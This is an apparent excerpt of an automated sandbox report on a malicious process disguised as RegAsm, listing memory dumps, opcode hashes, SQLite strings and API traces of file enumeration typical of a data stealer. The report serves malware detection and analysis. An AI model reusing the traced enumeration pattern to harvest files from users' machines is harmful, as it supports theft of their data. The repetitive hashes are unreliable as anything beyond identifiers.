                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');$malformed inverted index for FTS5 table %s.%s$unable to validate the inverted index for FTS5 table %s.%s: %s
                                                                                                                                                                                                                                                              • API String ID: 0-3572959941
                                                                                                                                                                                                                                                              • Opcode ID: e6828c588d6f195e7cea460168c31d60ecd4cb2651a1a11154bd8e44e436a519
                                                                                                                                                                                                                                                              • Instruction ID: b12e7cc0cb17b1c392c40c36423fcbad36fbbc860a6b77c96003562fa1d089c5
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e6828c588d6f195e7cea460168c31d60ecd4cb2651a1a11154bd8e44e436a519
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3E41B271901261AFE3219F7CDC88E9777ACEF45395F190129FC4AC2140DB359A5ECBA2
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: (FK)
                                                                                                                                                                                                                                                              • API String ID: 0-1642768157
                                                                                                                                                                                                                                                              • Opcode ID: 2077be652fe1677e40ec13bbcc01dd62d961ce8c9b8b548c66948bdf4edb5231
                                                                                                                                                                                                                                                              • Instruction ID: 18bda0ec2d82550d375f84cb5da41be5ed148b63cdbbf6e15d3a7bb92998ab9f
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2077be652fe1677e40ec13bbcc01dd62d961ce8c9b8b548c66948bdf4edb5231
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0081D1767052009FD7009E28EC40B66F3A1FB84336F6846BEE54A876E1E733E911CB90
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: %s-shm$readonly_shm$winOpenShm
                                                                                                                                                                                                                                                              • API String ID: 0-2815843928
                                                                                                                                                                                                                                                              • Opcode ID: e08d9dfef4a59e99e7361c811aaa1c0aef19c4b17fbae8148fe3d179f014680b
                                                                                                                                                                                                                                                              • Instruction ID: 206b6c9c0ef43c5c735fee93697b29e943cb14b8b8e25ef9acae85614de36de9
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e08d9dfef4a59e99e7361c811aaa1c0aef19c4b17fbae8148fe3d179f014680b
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B591CAB19003519FDB119F79CC84B1677ACAB04705F09412DFD8ADA281E73AE91ACBA3
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: [%!g,%!g],$[%!g,%!g]]
                                                                                                                                                                                                                                                              • API String ID: 0-3388633204
                                                                                                                                                                                                                                                              • Opcode ID: 031328240bdcdcbb4a100d51f74167cce9b8455e8e9d5e4e22666b9e475684bd
                                                                                                                                                                                                                                                              • Instruction ID: ee9e2f5b659b5edbe0366c2229130c8eb183be58aca1a8ab0498f77bed4181ae
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 031328240bdcdcbb4a100d51f74167cce9b8455e8e9d5e4e22666b9e475684bd
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BD510371900B059FD710DF2DC9C4B57B7A8BF42380F48862DF8499A291E776E989CB92
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: YHI;$delayed %dms for lock/sharing conflict at line %d$winAccess
                                                                                                                                                                                                                                                              • API String ID: 0-1098767804
                                                                                                                                                                                                                                                              • Opcode ID: 7363dba333b2a359e3a953c7e21749ac9d1d2c20c7f8c69ad48b9022d9083d5a
                                                                                                                                                                                                                                                              • Instruction ID: 26c223e293f32f4deebfcd747ba3771eb1339cde2d42121ed6b8c46e498972be
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7363dba333b2a359e3a953c7e21749ac9d1d2c20c7f8c69ad48b9022d9083d5a
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6741E7B6D153519FC640AF38C88195AFBA4ABB5311FCD4A2DF856932D0E730D684C6C3
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              • INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');, xrefs: 1984F33F
                                                                                                                                                                                                                                                              • unable to validate the inverted index for FTS%d table %s.%s: %s, xrefs: 1984F418
                                                                                                                                                                                                                                                              • malformed inverted index for FTS%d table %s.%s, xrefs: 1984F3F3
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');$malformed inverted index for FTS%d table %s.%s$unable to validate the inverted index for FTS%d table %s.%s: %s
                                                                                                                                                                                                                                                              • API String ID: 0-2809892521
                                                                                                                                                                                                                                                              • Opcode ID: ec63f0b9823a80c39e070354f73fd3e260778756540bf7353958a9ad1cdf7c8f
                                                                                                                                                                                                                                                              • Instruction ID: dcdd1775b9cbac77f78037f57df8faf659b34c3564da7c4147eae9f1ae37d6f3
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ec63f0b9823a80c39e070354f73fd3e260778756540bf7353958a9ad1cdf7c8f
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3441AEB19012A59FD3109B3DDC88B9B37ACEF41655F19442DFC0AC6180DB319A5ACAA2
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 39c01186d1047271403072344a276cdc30ae262c847d1b2bfdf6ebe523f1e381
                                                                                                                                                                                                                                                              • Instruction ID: 3b2ddf5a52e88969116dbafb1c6387826bdd9f8787ffdf0639fdf097b05f373f
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 39c01186d1047271403072344a276cdc30ae262c847d1b2bfdf6ebe523f1e381
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DE516175608211BFDB40EB68FC05F9A7BE2EF85320F1985A8F158872B1E332D991DB51
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • _EH_prolog.MSVCRT ref: 00414B4A
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 00414BA0
                                                                                                                                                                                                                                                                • Part of subcall function 0040F7A3: SHGetFolderPathA.SHELL32(00000000,O<B,00000000,00000000,?), ref: 0040F7D4
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 00414BC6
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 00414BE6
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 00414BFA
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?), ref: 00414C0D
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 00414C21
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?), ref: 00414C34
                                                                                                                                                                                                                                                                • Part of subcall function 0040E2EA: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E314
                                                                                                                                                                                                                                                                • Part of subcall function 0040F75F: _EH_prolog.MSVCRT ref: 0040F764
                                                                                                                                                                                                                                                                • Part of subcall function 0040F75F: GetFileAttributesA.KERNEL32(00000000,?,0040D11E,?,?,?,?), ref: 0040F778
                                                                                                                                                                                                                                                                • Part of subcall function 00401128: _EH_prolog.MSVCRT ref: 0040112D
                                                                                                                                                                                                                                                                • Part of subcall function 00414960: _EH_prolog.MSVCRT ref: 00414965
                                                                                                                                                                                                                                                                • Part of subcall function 00414960: GetProcessHeap.KERNEL32(00000000,0098967F,00000104), ref: 0041497C
                                                                                                                                                                                                                                                                • Part of subcall function 00414960: HeapAlloc.KERNEL32(00000000), ref: 00414983
                                                                                                                                                                                                                                                                • Part of subcall function 00414960: wsprintfA.USER32 ref: 0041499B
                                                                                                                                                                                                                                                                • Part of subcall function 00414960: FindFirstFileA.KERNEL32(?,?), ref: 004149B2
                                                                                                                                                                                                                                                                • Part of subcall function 00414960: StrCmpCA.SHLWAPI(?,00424800), ref: 004149CF
                                                                                                                                                                                                                                                                • Part of subcall function 00414960: StrCmpCA.SHLWAPI(?,00424804), ref: 004149E5
                                                                                                                                                                                                                                                                • Part of subcall function 00414960: wsprintfA.USER32 ref: 00414A05
                                                                                                                                                                                                                                                                • Part of subcall function 00414960: FindNextFileA.KERNEL32(00000000,?), ref: 00414A5C
                                                                                                                                                                                                                                                                • Part of subcall function 00414960: FindClose.KERNEL32(00000000), ref: 00414A6B
                                                                                                                                                                                                                                                                • Part of subcall function 00414960: lstrcat.KERNEL32(?,?), ref: 00414A90
                                                                                                                                                                                                                                                                • Part of subcall function 00414960: lstrcat.KERNEL32(?), ref: 00414AA3
                                                                                                                                                                                                                                                                • Part of subcall function 00414960: lstrlen.KERNEL32(?), ref: 00414AAC
                                                                                                                                                                                                                                                                • Part of subcall function 00414960: lstrlen.KERNEL32(?), ref: 00414AB9
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: lstrcat$H_prolog$FileFind$Heaplstrlenwsprintf$AllocAttributesCloseFirstFolderNextPathProcesslstrcpy
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 760377888-0
                                                                                                                                                                                                                                                              • Opcode ID: 2fd2118d9e73fe8952fe396a3eda644bbd21138287a78ec7cd839b56adaa2840
                                                                                                                                                                                                                                                              • Instruction ID: 552a54571b08f363630c61cde02512864f6d1c9145b9a996542915a0ff5b4072
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2fd2118d9e73fe8952fe396a3eda644bbd21138287a78ec7cd839b56adaa2840
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DA41B2B2C0111DABCF21EBB1EC49EDE777CAF49314F0045BAB505E2152E638E7588B95
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 2f000d6eafa93d16b44d4561eb70b5730d7693c166b8ecd957d0c3e6a9934496
                                                                                                                                                                                                                                                              • Instruction ID: 9d0dc15c47f6feb26048bc534bf324c03db852ee27cf263c6d2d49f5ac103ebc
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2f000d6eafa93d16b44d4561eb70b5730d7693c166b8ecd957d0c3e6a9934496
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5711E9FD8041007FD6049B28EC41E7B7769FF91700FD8949CF84A87250E736EA59D2A2
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: SELECT*FROM"%w".%s ORDER BY rowid$YHI;$ase$sqlite_master$sqlite_temp_master
                                                                                                                                                                                                                                                              • API String ID: 0-3745289582
                                                                                                                                                                                                                                                              • Opcode ID: 1a5c74c2c6ff7d34f0bb6faae27ca6a7d5f943ae25d30c534cdec7b81a7cdfc0
                                                                                                                                                                                                                                                              • Instruction ID: 99bc632a42f74721a7c8787101b674280f1be0ad1ba84a6c79c8045afe24d04b
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1a5c74c2c6ff7d34f0bb6faae27ca6a7d5f943ae25d30c534cdec7b81a7cdfc0
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D8E1D7B09043419FF711CF28C880B5FBBE8BF55704F08851EE98A97291E771EA45CB92
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Memory Dump Source
